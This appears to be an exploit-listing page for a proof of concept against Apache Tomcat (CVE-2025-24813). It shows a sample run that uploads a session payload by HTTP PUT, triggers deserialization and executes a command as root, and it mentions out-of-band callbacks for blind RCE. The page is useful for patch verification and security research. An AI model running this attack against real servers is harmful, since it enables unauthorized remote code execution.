Share
## https://sploitus.com/exploit?id=3C0AF930-5697-5FAF-9531-A5C827D90C5B
# CVE-2025-24813-PoC-exploit
Apache Tomcat Deserialization RCE
```
โฏ python3 exploit.py http://localhost:8080/ "id"
============================================================
CVE-2025-24813 - Apache Tomcat Partial PUT RCE
============================================================
[*] Target: http://localhost:8080
[*] Command: id
[*] Creating exploit payload...
[*] Uploading payload via PUT to: http://localhost:8080/session/exploit.session
[*] PUT Response: 201
[+] Payload uploaded successfully!
[*] Triggering deserialization...
[*] Trigger Response: 200
[*] Response body:
Deserialization Triggered!
โ ๏ธ Deserialization RCE Triggered!
Session file deserialized: exploit.session
Command executed: id
uid=0(root) gid=0(root) groups=0(root)
[*] Exploit complete!
If deserialization worked, check target for command execution.
For blind RCE, use out-of-band techniques (DNS/HTTP callbacks)
```